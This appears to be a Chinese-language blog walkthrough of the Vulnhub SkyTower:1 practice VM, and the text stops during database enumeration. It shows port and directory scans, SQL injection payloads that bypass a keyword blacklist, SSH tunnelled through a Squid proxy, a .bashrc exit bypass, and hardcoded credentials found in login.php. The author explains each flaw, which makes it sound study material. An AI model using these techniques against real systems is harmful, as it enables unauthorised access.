{"id":371,"date":"2024-02-21T16:09:53","date_gmt":"2024-02-21T08:09:53","guid":{"rendered":"http:\/\/162.14.82.114\/?p=371"},"modified":"2024-02-21T16:09:53","modified_gmt":"2024-02-21T08:09:53","slug":"vulnhub-skytower1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/371\/02\/21\/2024\/","title":{"rendered":"Vulnhub&#8211;SKYTOWER:1"},"content":{"rendered":"<h1>SKYTOWER: 1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221124421244\" \/><\/div><\/p>\n<p>\u6253\u5f00\u9776\u673a\uff0c\u8bbe\u4e3aNAT\u6a21\u5f0f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608780.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608780.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221130142822\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u626b\u4e00\u4e0b\uff0c\u6ca1\u626b\u51fa\u6765\uff1a<\/p>\n<h2>\u751f\u6210\u9776\u573a<\/h2>\n<p>\u7528vmware\u6253\u5f00\u8bd5\u8bd5\uff0c\u5148\u8981\u8f6c\u6362\u6210vmware\uff1a<\/p>\n<pre><code class=\"language-shell\">VBoxManage.exe clonehd E:\\vulnhub\\SkyTower\\SkyTower.vdi E:\\vulnhub\\SkyTower\\SkyTower.vmdk --format VMDK\n# 0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%\n# Clone medium created in format &#039;VMDK&#039;. UUID: 4d5df452-91cd-4267-923b-a959df93aed4\nvmware-vdiskmanager.exe -r &quot;E:\\vulnhub\\SkyTower\\SkyTower.vmdk&quot; -t 0 &quot;E:\\vulnhub\\SkyTower\\SkyTower1.vmdk&quot;\n# Creating disk &#039;E:\\vulnhub\\SkyTower\\SkyTower1.vmdk&#039;\n#   Convert: 100% done.\n# Virtual disk conversion successful.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608781.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608781.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221140755790\" \/><\/div><\/p>\n<p>\u626b\u5230\u4e86\uff0c\u8bbf\u95ee\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608782.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608782.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221140938605\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\u5230\uff0c\u4e0b\u9762\u5f00\u59cb\u8fdb\u884c\u516c\u9e21\ud83d\udc13\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sV -sT -T4 -p- 192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-21 01:12 EST\nNmap scan report for 192.168.244.129\nHost is up (0.0020s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE    SERVICE    VERSION\n22\/tcp   filtered ssh\n80\/tcp   open     http       Apache httpd 2.2.22 ((Debian))\n3128\/tcp open     http-proxy Squid http proxy 3.1.20\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 28.13 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\"># feroxbuster -u http:\/\/192.168.244.129\ndirb http:\/\/192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">---- Scanning URL: http:\/\/192.168.244.129\/ ----\n+ http:\/\/192.168.244.129\/background (CODE:200|SIZE:2572609)                                                   \n+ http:\/\/192.168.244.129\/cgi-bin\/ (CODE:403|SIZE:291)                                                         \n+ http:\/\/192.168.244.129\/index (CODE:200|SIZE:1136)                                                           \n+ http:\/\/192.168.244.129\/index.html (CODE:200|SIZE:1136)                                                      \n+ http:\/\/192.168.244.129\/server-status (CODE:403|SIZE:296)      <\/code><\/pre>\n<h3>wappalyzer<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608783.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608783.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221142116948\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u4e07\u80fd\u5bc6\u7801<\/h3>\n<pre><code class=\"language-sql\">1&#039; or &#039;1&#039;=&#039;1\n# Login Failed\n1&#039; or 1=1 --\n# There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near &#039;11 &#039; and password=&#039;passwd&#039;&#039; at line 1]<\/code><\/pre>\n<p>有错误回显（页面把数据库返回的 <code>$db-&gt;error<\/code> 原样打印给了用户），可以尝试利用！<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>查看报错，注入点处只剩下 <code>11<\/code>，说明 <code>or<\/code>、<code>=<\/code> 和 <code>--<\/code> 不是被转义，而是被直接删掉了。这种按黑名单删词的“过滤”很容易绕过：用 <code>||<\/code> 代替 <code>or<\/code>、用 <code>#<\/code> 代替 <code>--<\/code>；<code>1=1<\/code> 被删掉 <code>=<\/code> 后变成 <code>11<\/code>，在 MySQL 里仍是真值，<code>&#039;||11<\/code> 就足以让 where 条件恒真。尝试新的 payload：<\/p>\n<pre><code class=\"language-sql\">&#039;||1=1#\n&#039;&amp;1=1#<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608784.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608784.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221143334433\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>nice\uff01\u8fdb\u6765\u4e86\uff01<\/p>\n<pre><code class=\"language-text\">Username: john\nPassword: hereisjohn <\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2a\u51ed\u8bc1\uff0cssh\u767b\u5f55\u4e00\u4e0b\uff0c\u770b\u770b\u884c\u4e0d\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608785.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608785.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221143644785\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>直接连 22 端口连不上（上面 nmap 里 22\/tcp 显示为 <code>filtered<\/code>），被我取消掉了。不过扫出 3128 上有一个 <code>squid<\/code> 代理，猜测可以借它用 HTTP CONNECT 转发到靶机自己的 127.0.0.1:22——能成功也就说明这个 Squid 的 ACL 没有禁止 CONNECT 到本机回环地址：<\/p>\n<pre><code class=\"language-shell\">proxytunnel -p 192.168.244.129:3128 -d 127.0.0.1:22 -a 1234\n# socat TCP-LISTEN:1234,reuseaddr,fork PROXY:192.168.244.129:127.0.0.1:22,proxyport=3128<\/code><\/pre>\n<p>尝试进行连接，认证通过了但马上被踢出来（下面会看到是 <code>.bashrc<\/code> 末尾那句 <code>exit<\/code> 造成的）<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608786.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608786.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221144528426\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u6743\u9650\u63d0\u5347<\/h2>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u987a\u4fbf\u6267\u884c\u547d\u4ee4\uff0c\u67e5\u770b\u4e00\u4e0b\u767b\u5f55\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608787.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608787.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221145052699\" \/><\/div><\/p>\n<p>\u6587\u4ef6\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\"># ~\/.bashrc: executed by bash(1) for non-login shells.\n# see \/usr\/share\/doc\/bash\/examples\/startup-files (in the package bash-doc)\n# for examples\n\n# If not running interactively, don&#039;t do anything\ncase $- in\n    *i*) ;;\n      *) return;;\nesac\n\n# don&#039;t put duplicate lines or lines starting with space in the history.\n# See bash(1) for more options\nHISTCONTROL=ignoreboth\n\n# append to the history file, don&#039;t overwrite it\nshopt -s histappend\n\n# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)\nHISTSIZE=1000\nHISTFILESIZE=2000\n\n# check the window size after each command and, if necessary,\n# update the values of LINES and COLUMNS.\nshopt -s checkwinsize\n\n# If set, the pattern &quot;**&quot; used in a pathname expansion context will\n# match all files and zero or more directories and subdirectories.\n#shopt -s globstar\n\n# make less more friendly for non-text input files, see lesspipe(1)\n#[ -x \/usr\/bin\/lesspipe ] &amp;&amp; eval &quot;$(SHELL=\/bin\/sh lesspipe)&quot;\n\n# set variable identifying the chroot you work in (used in the prompt below)\nif [ -z &quot;${debian_chroot:-}&quot; ] &amp;&amp; [ -r \/etc\/debian_chroot ]; then\n    debian_chroot=$(cat 
\/etc\/debian_chroot)\nfi\n\n# set a fancy prompt (non-color, unless we know we &quot;want&quot; color)\ncase &quot;$TERM&quot; in\n    xterm-color) color_prompt=yes;;\nesac\n\n# uncomment for a colored prompt, if the terminal has the capability; turned\n# off by default to not distract the user: the focus in a terminal window\n# should be on the output of commands, not on the prompt\n#force_color_prompt=yes\n\nif [ -n &quot;$force_color_prompt&quot; ]; then\n    if [ -x \/usr\/bin\/tput ] &amp;&amp; tput setaf 1 &gt;&amp;\/dev\/null; then\n        # We have color support; assume it&#039;s compliant with Ecma-48\n        # (ISO\/IEC-6429). (Lack of such support is extremely rare, and such\n        # a case would tend to support setf rather than setaf.)\n        color_prompt=yes\n    else\n        color_prompt=\n    fi\nfi\n\nif [ &quot;$color_prompt&quot; = yes ]; then\n    PS1=&#039;${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ &#039;\nelse\n    PS1=&#039;${debian_chroot:+($debian_chroot)}\\u@\\h:\\w\\$ &#039;\nfi\nunset color_prompt force_color_prompt\n\n# If this is an xterm set the title to user@host:dir\ncase &quot;$TERM&quot; in\nxterm*|rxvt*)\n    PS1=&quot;\\[\\e]0;${debian_chroot:+($debian_chroot)}\\u@\\h: \\w\\a\\]$PS1&quot;\n    ;;\n*)\n    ;;\nesac\n\n# enable color support of ls and also add handy aliases\nif [ -x \/usr\/bin\/dircolors ]; then\n    test -r ~\/.dircolors &amp;&amp; eval &quot;$(dircolors -b ~\/.dircolors)&quot; || eval &quot;$(dircolors -b)&quot;\n    alias ls=&#039;ls --color=auto&#039;\n    #alias dir=&#039;dir --color=auto&#039;\n    #alias vdir=&#039;vdir --color=auto&#039;\n\n    #alias grep=&#039;grep --color=auto&#039;\n    #alias fgrep=&#039;fgrep --color=auto&#039;\n    #alias egrep=&#039;egrep --color=auto&#039;\nfi\n\n# some more ls aliases\n#alias ll=&#039;ls -l&#039;\n#alias la=&#039;ls -A&#039;\n#alias l=&#039;ls -CF&#039;\n\n# Alias definitions.\n# You 
may want to put all your additions into a separate file like\n# ~\/.bash_aliases, instead of adding them here directly.\n# See \/usr\/share\/doc\/bash-doc\/examples in the bash-doc package.\n\nif [ -f ~\/.bash_aliases ]; then\n    . ~\/.bash_aliases\nfi\n\n# enable programmable completion features (you don&#039;t need to enable\n# this, if it&#039;s already enabled in \/etc\/bash.bashrc and \/etc\/profile\n# sources \/etc\/bash.bashrc).\nif ! shopt -oq posix; then\n  if [ -f \/usr\/share\/bash-completion\/bash_completion ]; then\n    . \/usr\/share\/bash-completion\/bash_completion\n  elif [ -f \/etc\/bash_completion ]; then\n    . \/etc\/bash_completion\n  fi\nfi\n\necho\necho  &quot;Funds have been withdrawn&quot;\nexit<\/code><\/pre>\n<p>在 ssh 命令末尾直接给出要执行的远程命令（这里是 <code>bash<\/code>）即可在认证通过后执行命令。注意起作用的不是 <code>-C<\/code>，它只是开启压缩。原因是这样启动的 bash 是非交互式的：它要么根本不读 <code>.bashrc<\/code>，要么读到开头的 <code>case $- in *i*) ;; *) return;; esac<\/code> 就 return 了，走不到末尾那句 <code>exit<\/code>：<\/p>\n<pre><code class=\"language-shell\">ssh john@127.0.0.1 -p 1234 -C bash<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u5220\u9664<code>.bashrc<\/code>\u6587\u4ef6\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728 <code>suid<\/code> \u6f0f\u6d1e\uff0c\u518d\u770b\u4e0b<code>sudo -l<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608788.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608788.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221145933120\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u6211\u8bb0\u5f97<code>sudoedit<\/code>\u4f3c\u4e4e\u53ef\u4ee5\u505a\u4e9b\u4e1c\u897f\uff0c\u6682\u65f6\u60f3\u4e0d\u8d77\u6765\u4e86\uff0c\u5c1d\u8bd5\u63d0\u5347shell\uff1a<\/p>\n<pre><code class=\"language-shell\">python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>\u4f46\u662f\u663e\u793a\u6ca1\u6709\u68c0\u6d4b\u5230python\u547d\u4ee4\uff1a<\/p>\n<pre><code>2&lt;\/dev\/null find \/ | grep python<\/code><\/pre>\n<pre><code class=\"language-text\">\/usr\/lib\/python2.6\n\/usr\/lib\/python2.6\/dist-packages\n\/usr\/lib\/python2.6\/dist-packages\/debconf.py\n\/usr\/lib\/python3\n\/usr\/lib\/python3\/dist-packages\n\/usr\/lib\/python3\/dist-packages\/debconf.py\n\/usr\/lib\/python2.7\n\/usr\/lib\/python2.7\/dist-packages\n\/usr\/lib\/python2.7\/dist-packages\/debconf.py\n\/usr\/share\/nano\/python.nanorc<\/code><\/pre>\n<p>\u4f3c\u4e4e\u6ca1\u5b89\u88c5\u3002\u3002\u3002<\/p>\n<p>\u770b\u4e00\u4e0b\u6570\u636e\u5e93\u76f8\u5173\u6587\u4ef6\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff1a<\/p>\n<pre><code class=\"language-shell\">cd \/var\/www\nls\ncat login.php<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;?php\n\n$db = new mysqli(&#039;localhost&#039;, &#039;root&#039;, &#039;root&#039;, &#039;SkyTech&#039;);\n\nif($db-&gt;connect_errno &gt; 0){\n    die(&#039;Unable to connect to database [&#039; . $db-&gt;connect_error . 
&#039;]&#039;);\n\n}\n\n$sqlinjection = array(&quot;SELECT&quot;, &quot;TRUE&quot;, &quot;FALSE&quot;, &quot;--&quot;,&quot;OR&quot;, &quot;=&quot;, &quot;,&quot;, &quot;AND&quot;, &quot;NOT&quot;);\n$email = str_ireplace($sqlinjection, &quot;&quot;, $_POST[&#039;email&#039;]);\n$password = str_ireplace($sqlinjection, &quot;&quot;, $_POST[&#039;password&#039;]);\n\n$sql= &quot;SELECT * FROM login where email=&#039;&quot;.$email.&quot;&#039; and password=&#039;&quot;.$password.&quot;&#039;;&quot;;\n$result = $db-&gt;query($sql);\n\nif(!$result)\n    die(&#039;There was an error running the query [&#039; . $db-&gt;error . &#039;]&#039;);\nif($result-&gt;num_rows==0)\n    die(&#039;&lt;br&gt;Login Failed&lt;\/br&gt;&#039;);\n\n$row = $result-&gt;fetch_assoc();\n\necho &quot;&lt;HTML&gt;&quot;;\necho &#039;\n      &lt;div style=&quot;height:100%; width:100%;background-image:url(\\&#039;background.jpg\\&#039;);\n                                background-size:100%;\n                                background-position:50% 50%;\n                                background-repeat:no-repeat;&quot;&gt;\n      &lt;div style=&quot;\n                  padding-right:8px;  \n                  padding-left:10px; \n                  padding-top: 10px;  \n                  padding-bottom: 10px;  \n                  background-color:white;     \n                  border-color: #000000;\n                  border-width: 5px;\n                  border-style: solid;\n                  width: 400px;\n                  height:430px;\n                  position:absolute;\n                  top:50%;\n                  left:50%;\n                  margin-top:-215px; \/* this is half the height of your div*\/  \n                  margin-left:-200px;\n                                &quot;&gt;\n        &#039;;\necho &quot;&lt;br&gt;&lt;strong&gt;&lt;font size=4&gt;Welcome &quot;.$row[&quot;email&quot;].&quot;&lt;\/font&gt;&lt;br \/&gt; &lt;\/br&gt;&lt;\/strong&gt;&quot;;\necho &quot;As you may 
know, SkyTech has ceased all international operations.&lt;br&gt;&lt;br&gt; To all our long term employees, we wish to convey our thanks for your dedication and hard work.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Unfortunately, all international contracts, including yours have been terminated.&lt;\/strong&gt;&lt;br&gt;&lt;br&gt; The remainder of your contract and retirement fund, &lt;strong&gt;$2&lt;\/strong&gt; ,has been payed out in full to a secure account.  For security reasons, you must login to the SkyTech server via SSH to access the account details.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Username: &quot;.explode(&quot;@&quot;,$row[&quot;email&quot;])[0].&quot;&lt;\/strong&gt;&lt;br&gt;&lt;strong&gt;Password: &quot;.$row[&quot;password&quot;].&quot;&lt;\/strong&gt;&quot;;\necho &quot; &lt;br&gt;&lt;br&gt; We wish you the best of luck in your future endeavors. &lt;br&gt; &lt;\/div&gt; &lt;\/div&gt;&quot;;\necho &quot;&lt;\/HTML&gt;&quot;\n\n?&gt;<\/code><\/pre>\n<p>这段 <code>login.php<\/code> 把几个典型问题凑齐了：用 <code>str_ireplace<\/code> 按黑名单删关键字来“防注入”（单次替换、不递归，<code>||<\/code>、<code>#<\/code> 这类不在名单里的写法直接就能绕过；正确做法是预处理语句 \/ 参数化查询）；应用用 MySQL 的 <code>root<\/code>\/<code>root<\/code> 硬编码凭据连库；密码明文存在表里并原样回显到页面；数据库报错 <code>$db-&gt;error<\/code> 也直接吐给用户。顺手用这个硬编码凭据登录一下数据库：<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608789.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608789.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221152222114\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u62a5\u9519\uff0c\u6211\u5220\u9664<code>.bashrc<\/code>\u540e\u518d\u6b21\u8fdb\u884cssh\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608790.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608790.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221152542384\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u8fde\u63a5\u5230\u6570\u636e\u5e93\u4e86\uff0c\u8fd9\u91cc\u4e3a\u5565\u4e0d\u884c\uff0c\u7b49\u4e0b\u518d\u5c1d\u8bd5\u4fee\u6539\u4e0b\uff0c\u5148\u67e5\u770b\u4e00\u4e0b\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-shell\">mysql&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| SkyTech            |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 